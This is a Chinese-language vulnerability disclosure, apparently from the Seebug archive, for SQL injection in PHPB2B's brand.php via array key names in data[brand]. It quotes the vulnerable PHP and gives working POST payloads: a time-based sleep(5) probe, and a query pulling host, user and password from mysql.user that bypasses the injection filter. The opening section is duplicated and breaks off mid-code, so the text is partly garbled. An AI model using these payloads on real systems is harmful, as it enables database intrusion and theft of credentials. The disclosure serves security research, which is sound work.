### 简要描述: SQL注入#2 ### 详细说明: ``` 注入链接:/virtual-office/brand.php 注入参数:data[brand] 漏洞代码:(第24行开始) if (isset($_POST['save']) && !empty($company_id)) { $company->newCheckStatus($companyinfo['status']); if(!empty($_POST['data']['brand'])){ $vals = $_POST['data']['brand']; if(isset($_POST['id'])){ $id = intval($_POST['id']); } $attachment->rename_file = "brand-".($brand->getMaxId()+1); if(!empty($id)){ $attachment->insert_new = false; $attachment->rename_file = "brand-".$id; } if (!empty($_FILES['pic']['name'])) { $attachment->upload_process(); $vals['picture'] = $attachment->file_full_url; } if (!empty($vals['description'])) { $vals['description'] = stripcslashes($vals['description']); } $vals['letter'] = L10n::getinitial($vals['name']); $vals['member_id'] = $the_memberid; $vals['company_id'] = $company_id; if (!empty($id)) { $vals['modified'] = $time_stamp; $res = $brand->save($vals, "update", $id, null, $conditions); $vals =...
### 简要描述: SQL注入#2 ### 详细说明: ``` 注入链接:/virtual-office/brand.php 注入参数:data[brand] 漏洞代码:(第24行开始) if (isset($_POST['save']) && !empty($company_id)) { $company->newCheckStatus($companyinfo['status']); if(!empty($_POST['data']['brand'])){ $vals = $_POST['data']['brand']; if(isset($_POST['id'])){ $id = intval($_POST['id']); } $attachment->rename_file = "brand-".($brand->getMaxId()+1); if(!empty($id)){ $attachment->insert_new = false; $attachment->rename_file = "brand-".$id; } if (!empty($_FILES['pic']['name'])) { $attachment->upload_process(); $vals['picture'] = $attachment->file_full_url; } if (!empty($vals['description'])) { $vals['description'] = stripcslashes($vals['description']); } $vals['letter'] = L10n::getinitial($vals['name']); $vals['member_id'] = $the_memberid; $vals['company_id'] = $company_id; if (!empty($id)) { $vals['modified'] = $time_stamp; $res = $brand->save($vals, "update", $id, null, $conditions); $vals = $_POST['data']['brand'];从data['brand']中获取job数组参数,并将$vals数组传入save函数,save函数中通过以下以下代码构造SQL语句:(libraries/core/model.php) $keys = array_keys($posts); $cols = implode($keys,","); $tbname = (is_null($tbname))? $this->getTable():trim($tbname); $this->table_name = $tbname; if(!empty($id)){ $sql = "SELECT $cols FROM ".$tbname." WHERE ".$this->primaryKey."='".$id."'"; 在save函数中$vals数组的键名会被拆分为select语句的列名列表$cols,由于$vals可控导致sql注入,且是数组键名,因此可绕过代码中的注入检测 ``` ### 漏洞证明: ``` 漏洞测试: http://127.0.0.1/phpb2b/virtual-office/brand.php Post: data[brand][if((length(user())>61),1,sleep(5))%23]=1&save=1 为了方便调试,在代码里把执行的SQL语句打印出来 ``` [<img src="https://images.seebug.org/upload/201502/0911315253cf464b34459c3c7fa542cb47280f89.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0911315253cf464b34459c3c7fa542cb47280f89.png) ``` Mysql日志: ``` [<img src="https://images.seebug.org/upload/201502/09113137b78b6ad970679eed94aa1a8908b26e60.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09113137b78b6ad970679eed94aa1a8908b26e60.png) ``` 成功执行延时注入 可无视SQL注入检测,执行任意SQL语句 http://127.0.0.1/phpb2b/virtual-office/brand.php Post: data[brand][host,user,password/**/from/**/mysql.user/**/where/**/1>0/**/limit/**/0,1%23]=1&save=1 ``` [<img src="https://images.seebug.org/upload/201502/091131272c18944721a567463843895c7a3f5857.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091131272c18944721a567463843895c7a3f5857.png) ``` Mysql日志: ``` [<img src="https://images.seebug.org/upload/201502/091131190bd970f7292c1f3427e0f77e33c4b7df.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091131190bd970f7292c1f3427e0f77e33c4b7df.png) ``` ```
